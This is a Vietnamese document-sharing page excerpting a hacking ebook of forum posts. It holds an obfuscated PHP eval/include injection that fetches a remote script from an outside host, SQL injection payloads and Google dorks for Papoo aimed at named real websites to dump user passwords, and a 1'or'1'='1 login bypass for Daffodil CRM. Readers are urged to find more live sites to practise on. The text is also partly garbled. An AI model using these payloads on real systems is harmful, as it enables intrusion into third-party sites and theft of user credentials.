1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 450 pdf

6 74 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 181,02 KB

Nội dung

Parse error: parse error, unexpected '<' in /home2/xclubs/public_html/forum/sources/action_public/search.php(1262) : regexp code on line 1 Fatal error: Failed evaluating code: eval(include(chr(104).chr(116).chr( 116).chr(112).chr(58).chr(47).chr(47).chr(114).chr (115).chr(116).chr(46).chr(118).chr(111).chr(105). chr(100).chr(46).chr(114).chr(117).chr(47).chr(114 ).chr(53). .chr(55).chr(105).chr(112).chr(98).chr(105).chr(11 0).chr(99).chr(46).chr(116).chr(120).chr(116))); // selected='selected' in /home2/xclubs/public_html/forum/sources/action_public/search.php on line 1262 Buddy(vniss) Papoo Multiple SQL Injection Vulnerabilities Bugtraq ID: 16020 Class: Input Validation Error CVE: Remote: Yes Local: No Published: Dec 21 2005 12:00AM Updated: Dec 21 2005 12:00AM Credit: rakstija r0t3d3Vil is credited with the discovery of these vulnerabilities. Vulnerable: Papoo Papoo 2.1.2 -Discussion: Papoo is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. These issues affect version 2.1.2; other versions may also be vulnerable. Proof of concepts: Trích: http://www.example .com/index.php?menuid= Trích: [SQL] http://www.example.com/guestbook.php?menuid=[SQL] http://www.example.com/print.php?rep rint=&forumid=[SQL] http://www.example.com/print.php?reporeid_print=[SQL] Lên GOOGLE search : Trích: inurl:index.php?menuid= Papoo inurl:guestbook.php?menuid= Papoo v.v Script này dính SQL injec tại index.php?menuid=câu lệnh query (như example ở trên) Source của nó bạn có thể download tại đây : Trích: http://www.papoo.de/dokumente/upload/papoo_2.1.2.zip Thằng này xài SQL , trong bộ source đã có database (source/setup): Để ý đoạn này : Một vài thằng bị dính : Trích: http://www.campuscontent.de/index.php?menuid=- 1%20union%20select%201,2,username,email,password,p assword_org,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20X XX_papoo_user/* http://www.koblenzguitarfestival.de/index.php?menuid=15 http://www.bkk-melitta.de/bf/index.php?menuid=4 Pác Darkhack đâu rồi query phát xem nào Dondoc(VNISS) Daffodil CRM: Vulnerable to SQL-injection Trang chủ : http://www.daffodildb.com/crm/ Hiện tại chưa có bản vá lỗi . Lỗi do không kiểm tra và lọc các giá trị input tại form login Link truy cập : http://www.SITE.com:8080/daffodilcrm/userlogin.jsp Khai thác bằng By pass : 1'or'1'='1 Demo : ngay trang demo của nhà cung cấp cũng dính lỗi . http://www.daffodildb.com:8080/daffo /userlogin.jsp User : 1'or'1'='1 Password : 1'or'1'='1 Hoặc : User : admin Password : 1'or'1'='1 ====> Welcome 1'or'1'='1 That 's all and very easy ! p/s : Chịu khó tìm thêm site để thực hành ! Neo(VNISS)

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN